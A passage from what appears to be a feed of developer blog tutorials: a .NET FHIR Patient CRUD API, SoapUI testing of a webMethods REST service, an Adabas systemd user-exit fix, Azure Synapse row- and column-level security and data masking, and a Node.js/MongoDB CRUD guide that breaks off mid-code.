We start by writing defensively to catch any errors. First, a database transaction is started asynchronously to maintain the integrity of the data saved to SQL Server; if any part fails, the transaction is rolled back.

Then, in `if (!ModelState.IsValid) { return BadRequest(ModelState); }`, the model state is verified against the attributes and rules defined in the Patient model class; if there is a model validation error, a 400 is returned.

The line `PatientEntity patientEntity = PatientEntity.FromFhirPatient(patient);` **maps** the incoming FHIR Patient to a PatientEntity so the data can be saved to the database. These three lines, `_context.Patients.Add(patientEntity); await _context.SaveChangesAsync(); await transaction.CommitAsync();`, add the new patient from the request body, save it to the database, and commit the transaction. If any error is thrown, the transaction is rolled back via `await transaction.RollbackAsync();` and the error is caught inside the catch block.

A successful POST request in Postman would look something like this.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8p956z1jtb4tbzuezz3o.png)

Similarly, for the GET request here:

```
[HttpGet("{id}")]
public async Task<IActionResult> GetPatient(string id)
{
    try
    {
        PatientEntity? patientEntity = await _context.Patients.FindAsync(id);
        if (patientEntity != null)
        {
            return Ok(patientEntity);
        }
        else
        {
            return NotFound(new { Message = "Patient not found" });
        }
    }
    catch (FhirOperationException ex) when (ex.Status == System.Net.HttpStatusCode.NotFound)
    {
        return NotFound(new { Message = "Patient not found" });
    }
    catch (Exception ex)
    {
        return StatusCode(500, new { Message = "An error occurred", Details = ex.Message });
    }
}
```

We first try to find the entity by its primary id with `PatientEntity? patientEntity = await _context.Patients.FindAsync(id);`. The question mark in **PatientEntity?** wards off `warning CS8600 Converting null literal or possible null value to non-nullable type.` If patientEntity is not null, the matching entity is returned from the database with `return Ok(patientEntity);`; otherwise, the errors are caught inside the catch blocks. **FhirOperationException** derives from the base Exception class and represents HL7 FHIR errors that occur during application execution.
A successful Postman request for the GET operation is shown below.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/t6ye19p11bigne43j5v4.png)

Likewise, for the PUT operation here:

```
[HttpPut("{id}")]
public async Task<IActionResult> UpdatePatient(string id, [FromBody] Patient patient)
{
    if (id == null)
    {
        return BadRequest(new { Message = "Patient id cannot be null" });
    }

    using var transaction = await _context.Database.BeginTransactionAsync();
    try
    {
        PatientEntity? patientEntity = await _context.Patients.FindAsync(id);
        if (patientEntity == null)
        {
            return NotFound(new { Message = "Patient not found" });
        }
        if (patient.Name == null || patient.Name.Count == 0 || string.IsNullOrEmpty(patient.Name[0].Family))
        {
            return BadRequest(new { Message = "Patient name is required" });
        }

        patientEntity.FamilyName = patient.Name.FirstOrDefault()?.Family ?? string.Empty;
        patientEntity.GivenName = patient.Name.FirstOrDefault()?.Given.FirstOrDefault() ?? string.Empty;
        patientEntity.Gender = patient.Gender.HasValue ? patient.Gender.Value.ToString().ToLower() : string.Empty;
        patientEntity.BirthDate = patient.BirthDateElement?.ToDateTimeOffset()?.DateTime ?? DateTime.MinValue;

        _context.Entry(patientEntity).State = EntityState.Modified;
        await _context.SaveChangesAsync();
        await transaction.CommitAsync();

        return NoContent();
    }
    catch (DbUpdateConcurrencyException)
    {
        if (!_context.Patients.Any(e => e.Id == id))
        {
            return NotFound(new { Message = "Patient not found" });
        }
        else
        {
            throw;
        }
    }
    catch (Exception ex)
    {
        await transaction.RollbackAsync();
        return StatusCode(500, new { Message = "An error occurred", Details = ex.Message });
    }
}
```

First, a null check is performed on the id, which comes from the route parameter of the request URL. Then, as in the POST request, the update is wrapped in a database transaction to maintain data integrity: `using var transaction = await _context.Database.BeginTransactionAsync();`

In the line `if (patientEntity == null) { return NotFound(new { Message = "Patient not found" }); }`, if no patient with the given id is found, a 404 Not Found response is returned with a corresponding message.

The block `if (patient.Name == null || patient.Name.Count == 0 || string.IsNullOrEmpty(patient.Name[0].Family)) { return BadRequest(new { Message = "Patient name is required" }); }` validates the incoming Patient object. It checks whether the Name property is null, the Name count is zero, or the family name of the first HumanName is null or empty; if so, a 400 validation error is returned, as below.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/93m9xzy3fgg5s5p0ylaq.png)

In the next four lines, FamilyName, GivenName, Gender, and BirthDate are mapped to the values provided by the client, falling back to an empty string. Only BirthDate is treated differently: it is first converted to DateTimeOffset and then to DateTime, and if the conversion fails or the value is null, DateTime.MinValue is assigned.

The line `_context.Entry(patientEntity).State = EntityState.Modified;` marks the entity as modified and tells EF Core that **patientEntity** needs to be updated in the database. The next two lines, `await _context.SaveChangesAsync(); await transaction.CommitAsync();`, save the changes to the database and commit the transaction, after which a 204 No Content is returned. Otherwise, the error is caught inside the catch block.
A successful Postman request:

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/zuvxqigvbwirc5z6ywsa.png)

Note: we use the Patient model as the method parameter here since we have to adhere to the HL7 FHIR model.

Further, the delete method is also wrapped in a database transaction in order to maintain data integrity:

```
[HttpDelete("{id}")]
public async Task<IActionResult> DeletePatient(string id)
{
    using var transaction = await _context.Database.BeginTransactionAsync();
    try
    {
        var patientEntity = await _context.Patients.FindAsync(id);
        if (patientEntity == null)
        {
            return NotFound(new { Message = "Patient not found" });
        }

        _context.Patients.Remove(patientEntity);
        await _context.SaveChangesAsync();
        await transaction.CommitAsync();

        return NoContent();
    }
    catch (Exception ex)
    {
        await transaction.RollbackAsync();
        return StatusCode(500, new { Message = "An error occurred", Details = ex.Message });
    }
}
```

First, the patient is looked up by id. If a patient with the given id is found, the line `_context.Patients.Remove(patientEntity);` removes the entity from the database, but only once `await _context.SaveChangesAsync();` executes and the transaction completes. If there is any error, the transaction is rolled back and an error message is returned accordingly.

A successful Postman request for this operation:

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/p5h0ig95lyy0khie2u3c.png)

And the search operation, by id or by name:

```
[HttpGet("search")]
public async Task<IActionResult> SearchPatient([FromQuery] string? name = null, string? id = null)
{
    try
    {
        IQueryable<PatientEntity> query = _context.Patients;
        if (!string.IsNullOrEmpty(name))
        {
            query = query.Where(n => n.FamilyName == name || n.GivenName == name);
        }
        if (!string.IsNullOrEmpty(id))
        {
            query = query.Where(p => p.Id == id);
        }

        List<PatientEntity> patients = await query.ToListAsync();
        if (!patients.Any())
        {
            return NotFound(new { Message = "No Patient found" });
        }

        return Ok(patients);
    }
    catch (Exception ex)
    {
        return StatusCode(500, new { Message = "An error occurred", Details = ex.Message });
    }
}
```

Since we are interacting directly with the database here, I have used the **PatientEntity** type in `IQueryable<PatientEntity> query = _context.Patients;` instead of the Patient type. Then null and empty-string checks are performed for both id and name, and the results are filtered using the Where extension method. The line `List<PatientEntity> patients = await query.ToListAsync();` returns the list of patients matching the records in the database; any error is caught inside the catch block.

Successful Postman requests are shown below.

**Search by name**

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/nh5bj15yea4rwtnbmt74.png)

**Search by id**

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/claaap7ler9cxvmfmznr.png)

You can clone and play with the GitHub repo below; no permission is required. In case of any issue, feel free to message me and I will try to respond ASAP!

Repo: https://github.com/mannawar/fhir-msft-sqlserver

Thanks for your time!
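**Bonus**: if you want to exercise the POST endpoint quickly, here is a minimal request body (a sketch: any valid FHIR R4 Patient JSON works, and since the Id is database-generated it can be omitted):

```
{
  "resourceType": "Patient",
  "name": [ { "family": "Dev", "given": [ "Kapil" ] } ],
  "gender": "male",
  "birthDate": "1990-01-01"
}
```

Send it with a `Content-Type: application/json` header to `POST /fhir/patient`.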
mannawar
1,917,269
REST API Client - Testing a provided API
Introduction This section explains how to test an API application using a Rest API client...
0
2024-07-09T12:14:11
https://tech.forums.softwareag.com/t/rest-api-client-testing-a-provided-api/268250/1
api, restapi, adabas
---
title: REST API Client - Testing a provided API
published: true
date: 2024-06-14 17:41:07 UTC
tags: api, restapi, adabas
canonical_url: https://tech.forums.softwareag.com/t/rest-api-client-testing-a-provided-api/268250/1
---

## Introduction

This section explains how to test an API application using a REST API client (e.g. SoapUI or Postman). In our case we will use SoapUI as the REST API client.

![Overview_components_APIClient](https://global.discourse-cdn.com/techcommunity/original/3X/1/5/15801e9c8f11ed83c41cfda048e25f00fdf3868a.png)

**The following topic modules are considered in more detail in this tutorial:**

1. Change Resource Configurations
2. Testing in SoapUI

## Change Resource Configurations

Switch to the Service Development perspective and refresh the Package Navigator view (press F5, or right-click on a package and select Refresh). To customize resource configurations, click on the desired resource. Then you can edit REST resources (e.g. supported HTTP methods). To do this, select a resource from the list and click Edit.

![change resource configurations](https://global.discourse-cdn.com/techcommunity/original/3X/3/3/3363abd5a4c6df218a8f309100e2393f0a1514d6.png)

Now you can specify, for example, which HTTP methods should be supported.

![Edit REST Resource Operation](https://global.discourse-cdn.com/techcommunity/original/3X/b/5/b547f0a495ce637da44f5b10d42d5f329ca7860b.png)

## Testing a provided API

To perform an instant test, launch SoapUI from the Windows Start menu. Then select File and New REST Project.

[![New REST Project](https://global.discourse-cdn.com/techcommunity/original/3X/8/3/834c8ae77158857197ee7146990bf7490244d60c.png)](https://global.discourse-cdn.com/techcommunity/original/3X/8/3/834c8ae77158857197ee7146990bf7490244d60c.png "New REST Project")

Provide [http://localhost:5555/restv2/Resourcename/Programname](http://localhost:5555/restv2/Resourcename/Programname) as the initial REST service URI and click OK.

![provide URI](https://global.discourse-cdn.com/techcommunity/original/3X/1/d/1d795ca1d8003822c63ffeedf537b5b58915046b.png)

You can also copy the URI from the resource in the Service Development perspective. To do this, open the corresponding resource and look in the properties and resource configurations.

![Resource properties](https://global.discourse-cdn.com/techcommunity/original/3X/c/1/c17e610b58a7fbf06e744c78e16db31fbce616a6.png)

![Resource configurations](https://global.discourse-cdn.com/techcommunity/original/3X/b/e/be48a4ce72cd0f9241d47fd8f0af40990629747e.png)

In the Navigator, now rename the generated REST project (e.g. REST Employees), the method (in our case Employees), and the generated request (in our case Employees).

![Navigator - renaming](https://global.discourse-cdn.com/techcommunity/original/3X/c/4/c4fae1eaa50f5dc991594a37a4a52a33a922f60f.png)

Then double-click the generated request in the Navigator and provide the following parameters for the REST request:

- Method type: GET
- Request properties tab:
  - Username: Administrator
  - Password: manage
- Request header (click on Headers to add a header name):
  - Header name: Accept
  - Header value: application/json

**Method type:**

![Methodtype](https://global.discourse-cdn.com/techcommunity/original/3X/d/a/dad6cb5f4c2097ac0f276e289180bf13f76d7a1c.png)

**Username + password:**

![password and username](https://global.discourse-cdn.com/techcommunity/original/3X/c/e/ced426e2b6b08c8c41f7c2f6e3792198dd4b4cbf.png)

**Request header:**
1. Add HTTP Header:

![add http header](https://global.discourse-cdn.com/techcommunity/original/3X/6/2/62b52c07f4b3d8f7b326321d6889ef4c78cca092.png)

2. Enter the header value:

![add header value](https://global.discourse-cdn.com/techcommunity/original/3X/f/c/fcd76f7f6f1ca47643f9305b03cf0f820159a57c.png)

Once you have entered all the parameters just mentioned, click on the green arrow ![Submit request](https://global.discourse-cdn.com/techcommunity/original/3X/4/0/409ca43c645d4eec8c7848c0dc525a21c5860a70.png) to submit the request.

Open the Raw tab of the response to see the HTTP response code. In case of success (200), the REST service should return a list of employees in JSON format. Therefore, switch to the JSON tab of the response.

## Conclusion: Most Important Facts

- REST API clients: SoapUI, Postman, etc.
- The following parameters must be set for the REST request before starting it:
  - **Method:** GET
  - **Username:** Administrator + **Password:** manage
  - **Request Header:** Accept + **Request Header value:** application/json

With this tutorial you have successfully completed our series and now have a better overview of how the various Software AG products (Adabas, Natural, NaturalOne, EntireX, webMethods) work together on the topic of APIs. Now you can try out the things you have learned yourself. Have fun!

[Read full topic](https://tech.forums.softwareag.com/t/rest-api-client-testing-a-provided-api/268250/1)
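_Tip: the same request can also be verified from the command line with curl, using the URI, credentials, and Accept header from this tutorial:_

```
curl -u Administrator:manage -H "Accept: application/json" http://localhost:5555/restv2/Resourcename/Programname
```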
techcomm_sag
1,917,278
How to activate Adabas as a service in LINUX, if the database has a user exit defined?
Introduction When configuring Adabas as a service in Linux, you may encounter challenges...
0
2024-07-09T12:17:29
https://tech.forums.softwareag.com/t/how-to-activate-adabas-as-a-service-in-linux-if-the-database-has-a-user-exit-defined/296443/1
adabas, linux, database, guide
---
title: How to activate Adabas as a service in LINUX, if the database has a user exit defined?
published: true
date: 2024-06-04 08:52:13 UTC
tags: adabas, linux, database, guide
canonical_url: https://tech.forums.softwareag.com/t/how-to-activate-adabas-as-a-service-in-linux-if-the-database-has-a-user-exit-defined/296443/1
---

## Introduction

When configuring Adabas as a service in Linux, you may encounter challenges related to user exits. In this guide, we'll explore the steps to activate Adabas as a service while taking user exits into account (in this case, user exit 4).

## Pre-requisites

| Product | Adabas |
| --- | --- |
| Versions | 7.0.1, 7.1.1, 7.2, 7.3 |
| Platforms | Linux and Cloud |

## Problem

You may encounter this issue after creating a daemon (for example, db012.service) with the command:

`create_systemd_service_file.sh 012 sag`

and starting the database as a service with:

`systemctl start db012`

## Cause

If the adanuc.log entries include "shared library ADAUEX\_4, path name () could not be loaded" and "invalid environment variable" error messages, it implies difficulties in starting the database as a service with a user exit defined. Setting the environment variable ADAUEX\_4 in a command shell is not adequate when the database is configured as a systemd service. To solve this stumbling block, define an entry in the [ENVIRONMENT] section of the database's DBXXX.INI file. The inability to start a database with a user exit defined can manifest as loading errors for the shared library ADAUEX\_4.

## Resolution

Setting the environment variable ADAUEX\_4 in a command shell is not sufficient when a database is configured as a systemd service. [Read the full topic here](https://tech.forums.softwareag.com/t/how-to-activate-adabas-as-a-service-in-linux-if-the-database-has-a-user-exit-defined/296443/1) and find out the possible solution.
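For illustration, such an entry in the database's INI file (e.g. DB012.INI for database 012) might look like this. This is only a sketch: the library path is hypothetical and must point to your actual user exit shared library.

```
[ENVIRONMENT]
ADAUEX_4=/opt/softwareag/Adabas/userexits/adauex_4.so
```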
techcomm_sag
1,917,507
Azure Synapse Analytics Security: Access Control
Introduction The assets of a bank are only accessible to some high-ranking officials, and...
0
2024-07-14T12:40:32
https://dev.to/ayush9892/azure-synapse-analytics-security-access-control-4chl
azure, dataengineering, sqlserver, database
## Introduction

The assets of a bank are only accessible to some high-ranking officials, and even they don't have access to individual user lockers. These privacy features help build trust among customers. The same goes in our IT world: every user wants their sensitive data to be accessible only to themselves, and not even available to those with higher privileges within the company. So, as you move data to the cloud, securing the data assets is critical to building trust with your customers and partners.

To enable these kinds of protections, Azure Synapse supports a wide range of advanced access control features to control who can access what data. These features are:

- Object-level security
- Row-level security
- Column-level security
- Dynamic data masking
- Synapse role-based access control

In this blog we will explore these features.

---

## Object-level security

In Azure Synapse, whenever we create tables, views, stored procedures, and functions, they are created as objects. In a dedicated SQL pool these objects can be secured by granting specific permissions to database-level users or groups. For example, you can give `SELECT` permissions to user accounts or [database roles](https://learn.microsoft.com/en-us/sql/relational-databases/security/authentication-access/database-level-roles?view=sql-server-ver15&preserve-view=true) to give access to specific objects.

To assign permission: `GRANT SELECT ON [schema_name].[table_name] TO [user_or_group];`

To revoke permission: `REVOKE SELECT ON [schema_name].[table_name] FROM [user_or_group];`

Additionally, when you assign a user to the [Synapse Administrator RBAC role](https://learn.microsoft.com/en-us/azure/synapse-analytics/security/synapse-workspace-synapse-rbac-roles), they automatically gain full access to all dedicated SQL pools within that workspace, which allows them to perform any action (including managing permissions) across all databases.

In addition, when a user is assigned the Storage Blob Data Contributor role (READ, WRITE, and EXECUTE permissions) on a data lake, and that data lake is connected to a workspace such as Synapse or Databricks, these permissions are automatically applied to Spark-created tables. This is known as _**Microsoft Entra pass-through**_.

See what happens when the Storage Blob Data Contributor role is assigned to me:

![Role Assign](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5iudywcmrgt76ud0pmni.jpeg)

Then I am able to query my Spark-created table.

![Query Table](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/1cwg626sdrtrbvbie9ol.jpeg)

But when I removed that role from myself, it gave me an error!

![Unauthorised query access](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/893uoedvodatywlc0vdi.jpeg)

---

## [Row-level security](https://learn.microsoft.com/en-us/sql/relational-databases/security/row-level-security?view=azure-sqldw-latest)

![RLS](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kycwjommlkcy0dhw5ypk.png)

RLS is a mechanism to restrict row-level access (read, write, ...) based on the user's context data. A typical use case is a common database table used by multiple tenants to store their data; in such a case, we want each tenant to have access to their own data only. RLS enables this fine-grained access control without having to redesign your data warehouse. It also eliminates the need to use `Views` to filter out rows for access control management.
> **NOTE**: The access restriction logic is located in the database tier, and the database system applies the access restrictions every time the data is accessed from any tier. This makes the security system more reliable and robust by reducing the surface area of your security system.

<u>_How to implement RLS?_</u>

RLS can be implemented by using a [SECURITY POLICY](https://learn.microsoft.com/en-us/sql/t-sql/statements/create-security-policy-transact-sql?view=azure-sqldw-latest). RLS is a form of predicate-based access control that works by automatically applying a security predicate to all queries on a table. The security predicate binds the predicate function to the table. The predicate function is basically a user-defined function that determines whether the user executing the query has access to the row or not.

![SECURITY POLICY](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/aohf9ciaoznjg2or7cfe.png)

**There are two types of security predicates:**

- **_Filter predicates:_** They silently filter out rows that users shouldn't see during SELECT, UPDATE, and DELETE operations. This is used when you want to hide data without disrupting the user experience. For example, in an employee database, a filter predicate can ensure salespeople only see their own customer records. They wouldn't even know about records belonging to other salespeople.
- **_Block predicates:_** They explicitly block write operations (INSERT, UPDATE, DELETE) that violate pre-defined rules. If a user tries to perform an action that breaks the rules, the operation fails with an error message. This is used where you want to prevent unauthorized modifications.

_<u>Implementing Filter Predicates</u>_

**Step 1:** Create dummy users and a table, then grant read access to these objects.

```
CREATE SCHEMA Sales
GO

CREATE TABLE Sales.Region (
    id int,
    SalesRepName nvarchar(50),
    Region nvarchar(50),
    CustomerName nvarchar(50)
);

-- Inserting data
INSERT INTO Sales.Region VALUES (1, 'Mann', 'Central Canada', 'C1');
INSERT INTO Sales.Region VALUES (2, 'Anna', 'East Canada', 'E1');
INSERT INTO Sales.Region VALUES (3, 'Anna', 'East Canada', 'E2');
INSERT INTO Sales.Region VALUES (4, 'Mann', 'Central Canada', 'C2');
INSERT INTO Sales.Region VALUES (6, 'Anna', 'East Canada', 'E3');

-- Creating Users
CREATE USER SalesManager WITHOUT LOGIN;
CREATE USER Mann WITHOUT LOGIN;
CREATE USER Anna WITHOUT LOGIN;

-- Granting Read Access to the Users
GRANT SELECT ON Sales.Region TO SalesManager;
GRANT SELECT ON Sales.Region TO Mann;
GRANT SELECT ON Sales.Region TO Anna;
```

**Step 2:** Create the security predicate function.

```
-- Creating Schema for the Security Predicate Function
CREATE SCHEMA spf;
GO

CREATE FUNCTION spf.securitypredicatefunc(@SaleRepName AS NVARCHAR(50))
RETURNS TABLE
WITH SCHEMABINDING
AS
RETURN SELECT 1 AS securitypredicate_result
WHERE @SaleRepName = USER_NAME() OR USER_NAME() = 'SalesManager';
```

The function returns a table with the single value 1 when the `WHERE` condition is satisfied. `SCHEMABINDING` ensures that the underlying objects (tables, views, etc.) referenced by the function cannot be modified (dropped or altered) while the function exists.

**Step 3:** Create the security policy that adds the filter predicate and binds the predicate function to the table.

```
CREATE SECURITY POLICY MySalesFilterPolicy
ADD FILTER PREDICATE spf.securitypredicatefunc(SalesRepName)
ON Sales.Region
WITH (STATE = ON);
```

**Step 4:** Test your RLS.
```
EXECUTE AS USER = 'Mann';
SELECT * FROM Sales.Region ORDER BY id;
REVERT;
```

When a user (e.g., 'Mann') executes a query on the table, SQL Server automatically invokes the security predicate function for each row in the table. Internally, the function is called by SQL Server as part of the query execution plan, so the permissions required to execute the function are inherently handled by the SQL Server engine; there is no need to explicitly grant permissions on the function.

![output](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/t61fs7whfon1hnrgxzlh.png)

**Step 5:** You can disable RLS by altering the security policy.

```
ALTER SECURITY POLICY MySalesFilterPolicy WITH (STATE = OFF);
```

---

## Column-level security

![CLS](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xba3lsu4gyn0ol30r96j.png)

It is similar to RLS, but as its name suggests, it applies at the column level. For example, in financial services, only account managers have access to customer social security numbers (SSN), phone numbers, and other personally identifiable information (PII). Additionally, the method of implementing CLS differs: it is implemented through object-level security, by granting permissions on specific columns.

_<u>Implementing CLS</u>_

**Step 1:** Create a dummy user and table.

```
CREATE USER TestUser WITHOUT LOGIN;

CREATE TABLE Membership (
    MemberID int IDENTITY,
    FirstName varchar(100) NULL,
    SSN char(9) NOT NULL,
    LastName varchar(100) NOT NULL,
    Phone varchar(12) NULL,
    Email varchar(100) NULL
);
```

**Step 2:** Grant the user access to all columns except the sensitive ones.

```
GRANT SELECT ON Membership (
    MemberID,
    FirstName,
    LastName,
    Phone,
    Email
) TO TestUser;
```

**Step 3:** Now, if the user tries to access all columns, an error is raised.

```
EXECUTE AS USER = 'TestUser';
SELECT * FROM Membership;
```

![Error output](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/d71ewgznmqihj8yko44h.png)

---

## [Dynamic data masking](https://learn.microsoft.com/en-us/sql/relational-databases/security/dynamic-data-masking?view=sql-server-ver16#best-practices-and-common-use-cases)

![Dynamic Data Masking](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/onuq98kt4u4gupwtc2hl.png)

It is the process of limiting the exposure of sensitive data to users who should not be able to view it. For example, customer service agents may need to access customer records but should not see full credit card numbers, which can therefore be masked.

**You may ask: why can't we use CLS, or why don't we completely restrict the access?** Because of these reasons:

- CLS completely restricts both reading and altering a column. Masking, on the other hand, doesn't prevent updates to the masked column: users who receive masked data when querying the column can still update the data if they have write permissions.
- With masking, you can use `SELECT INTO` or `INSERT INTO` to copy data from a masked column into another table, where it is stored as masked data (assuming it's exported by a user without UNMASK privileges). With CLS, you can't do anything with a restricted column you don't have access to.

> **NOTE**:
> - Administrative users and roles (such as sysadmin or db_owner) can always view unmasked data via the CONTROL permission, which includes both the `ALTER ANY MASK` and `UNMASK` permissions.
> - You can grant or revoke the UNMASK permission at the database level, schema level, table level, or column level to a user, database role, Microsoft Entra identity, or Microsoft Entra group.
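To make the last point concrete, here is a sketch of the grant syntax at each scope (assuming a role named `SupportAgents` and the `Data.Membership` table created in the next section; granular UNMASK requires an engine version that supports it):

```
-- Database level: unmask every masked column in the database
GRANT UNMASK TO SupportAgents;

-- Schema level: unmask all masked columns in the Data schema
GRANT UNMASK ON SCHEMA::Data TO SupportAgents;

-- Table level
GRANT UNMASK ON Data.Membership TO SupportAgents;

-- Column level: unmask only the Phone column
GRANT UNMASK ON Data.Membership(Phone) TO SupportAgents;
```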
_<u>Implementing DDM</u>_

**Step 1:** Create a dummy user.

`CREATE USER MaskingTestUser WITHOUT LOGIN;`

**Step 2:** Create a table and apply masking on the required columns.

```
CREATE SCHEMA Data;
GO

CREATE TABLE Data.Membership (
    FirstName VARCHAR(100) MASKED WITH (FUNCTION = 'partial(1, "xxxxx", 1)') NULL,
    LastName VARCHAR(100) NOT NULL,
    Phone VARCHAR(12) MASKED WITH (FUNCTION = 'default()') NULL,
    Email VARCHAR(100) MASKED WITH (FUNCTION = 'email()') NOT NULL,
    DiscountCode SMALLINT MASKED WITH (FUNCTION = 'random(1, 100)') NULL
);

-- inserting sample data
INSERT INTO Data.Membership
VALUES ('Kapil', 'Dev', '555.123.4567', 'kapil@team.com', 10);
```

Here, you can see I have applied both default and custom masking functions.

**Step 3:** Grant the `SELECT` permission on the schema where the table resides; the user now sees masked data.

`GRANT SELECT ON SCHEMA::Data TO MaskingTestUser;`

![Masked Output](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qyax1rmytc53gmclnkeu.png)

**Step 4:** Granting the `UNMASK` permission allows users to see unmasked data.

`GRANT UNMASK TO MaskingTestUser;`

![Unmasked Output](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wiagnr4x3bxy7oehwhbt.png)

**Step 5:** Use the `ALTER TABLE` statement to add a mask to an existing column in the table, or to edit the mask on that column.

```
ALTER TABLE Data.Membership
ALTER COLUMN LastName ADD MASKED WITH (FUNCTION = 'partial(2,"xxxx",0)');

ALTER TABLE Data.Membership
ALTER COLUMN LastName VARCHAR(100) MASKED WITH (FUNCTION = 'default()');
```

---

## [Synapse role-based access control](https://learn.microsoft.com/en-us/azure/synapse-analytics/security/synapse-workspace-understand-what-role-you-need)

Basically, it leverages the built-in roles to assign permissions to users, groups, or other security principals to manage who can:

- Publish code artifacts and list or access published code artifacts.
- Execute code on Apache Spark pools and integration runtimes.
- Access linked (data) services that are protected by credentials.
- Monitor or cancel job executions, review job output and execution logs.
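As a closing sketch, a built-in Synapse RBAC role can also be assigned outside the portal using the Azure CLI (the workspace name and assignee below are placeholders to adapt to your environment):

```
az synapse role assignment create \
  --workspace-name my-workspace \
  --role "Synapse Administrator" \
  --assignee "user@contoso.com"
```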
ayush9892
1,917,608
Beginner's Tutorial for CRUD Operations in NodeJS and MongoDB
Introduction CRUD operations stand for Create, Read, Update, and Delete. This procedure...
0
2024-07-16T21:40:48
https://dev.to/danmusembi/beginners-tutorial-for-crud-operations-in-nodejs-and-mongodb-k7k
webdev, javascript, programming, tutorial
## Introduction

CRUD operations stand for Create, Read, Update, and Delete. These operations allow you to work with data in a MongoDB database: with them, you can create, read, update, and delete data in MongoDB.

## What is MongoDB

[MongoDB](https://www.mongodb.com/) is a powerful and flexible solution for handling modern data needs. As a leading [NoSQL database](https://www.mongodb.com/resources/basics/databases/nosql-explained), MongoDB offers a dynamic schema design, enabling developers to store and manage data in a way that aligns seamlessly with contemporary application requirements.

## What is Node.js

[Node.js](https://nodejs.org/en/about) is a runtime environment that allows you to run JavaScript on the server side, rather than just in the browser. It's built on Chrome's V8 JavaScript engine, making it fast and efficient. With Node.js, you can build scalable network applications easily, using a single programming language for both client and server-side code. It's especially good for handling many simultaneous connections and real-time applications like chat servers or online games.

## Prerequisites

- Install Node.js: Download and install Node.js from the official [website](https://nodejs.org/en/about) if you haven't already.
- Install MongoDB: Install MongoDB on your machine. Follow the instructions on the official MongoDB [website](https://www.mongodb.com/).

## Step 1: Initialize a new project

Open your preferred code editor (VS Code), cd into the directory where you want to create the project, then enter the command below to create a new project.

```
npm init
```

Next, use the command below to install the necessary packages.

```
npm install express mongodb
```

To be able to start the application, add `"serve": "node index.js"` under the `scripts` section of `package.json`.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/12kx8hhxmx8q55p6411q.PNG)

## Create and test the Express.js server

In the root directory create an `index.js` file and enter the following code in it.

```
const express = require('express')
const app = express()

app.listen(3000, () => {
    console.log('Server is running on port 3000')
});

app.get('/', (req, res) => {
    res.send("Hello Node API")
})
```

In this code, we create a basic Node.js server using the Express framework, which listens on port 3000. When you visit the root URL ("/"), it responds with the message "Hello Node API".

Now run the application with the command `npm run serve` to observe the results, as shown below.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/dh0vrvk32qnd8pefexdu.PNG)

To test whether the server is working, enter `localhost:3000` in the browser and see the results as shown below.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/pvpcbm2hp6eu5tvitxba.PNG)

## Creating the MongoDB connection

Visit [MongoDB](https://www.mongodb.com/) and sign in to your account, or create one if you don't have it yet. Create a new project: give it a name and click "Create Project."

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/alrubq6ot9x8cb987tr2.PNG)

Click the Create button, and then select the free M0 template. Scroll down, give your cluster a name, and click Create deployment.
![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/m8exxrnrm5i6pu4nnsvr.PNG)

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/530ah5f8spqwi0fih291.PNG)

On the following screen, enter a username and password for your cluster; make sure to copy or remember the password. Click Create Database user. After that, click the Choose a connection method button, select Connect via drivers, and copy the connection string.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/b0p4g1h3ya512mfd7k63.PNG)

To access MongoDB we need a dependency called Mongoose, so make sure to install it with `npm i mongoose`.

Create a `db.js` file in the root directory and paste the following code, replacing `<password>` with the password you created.

```
const mongoose = require('mongoose');

mongoose.connect("mongodb+srv://admindan:<password>@crudbackend.5goqnqm.mongodb.net/?retryWrites=true&w=majority&appName=crudbackend")
  .then(() => {
    console.log('Connected to the database');
  })
  .catch((error) => {
    console.log('Connection failed', error);
  });

module.exports = mongoose;
```

Import it at the top of the `index.js` file: `const mongoose = require('./db');`

To test that the database is connecting, run the application and you should see the result in the terminal as shown below.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/whebactnow9cddqez5eu.PNG)

## Creating CRUD functions

Now that we have our database connected, we need a model to store our data in MongoDB. Make a models folder in the root directory, then create a file called `product.model.js` and insert the following code into it.

```
const mongoose = require("mongoose");

const ProductSchema = mongoose.Schema(
  {
    name: {
      type: String,
      required: [true, "Please enter product name"],
    },

    quantity: {
      type: Number,
      required: true,
      default: 0,
    },

    price: {
      type: Number,
      required: true,
      default: 0,
    },

    image: {
      type: String,
      required: false,
    },
  },
  {
    timestamps: true,
  }
);

const Product = mongoose.model("Product", ProductSchema);

module.exports = Product;
```

## Defining the controller functions

We're creating the functions that read and write data in our MongoDB collection. Create a controllers folder in the root directory and a file called `product.controller.js` within it. Paste the following code in it.
```
const Product = require("../models/product.model");

const getProducts = async (req, res) => {
  try {
    const products = await Product.find({});
    res.status(200).json(products);
  } catch (error) {
    res.status(500).json({ message: error.message });
  }
};

const getProduct = async (req, res) => {
  try {
    const { id } = req.params;
    const product = await Product.findById(id);
    res.status(200).json(product);
  } catch (error) {
    res.status(500).json({ message: error.message });
  }
};

const createProduct = async (req, res) => {
  try {
    const product = await Product.create(req.body);
    res.status(200).json(product);
  } catch (error) {
    res.status(500).json({ message: error.message });
  }
};

const updateProduct = async (req, res) => {
  try {
    const { id } = req.params;
    const product = await Product.findByIdAndUpdate(id, req.body);

    if (!product) {
      return res.status(404).json({ message: "Product not found" });
    }
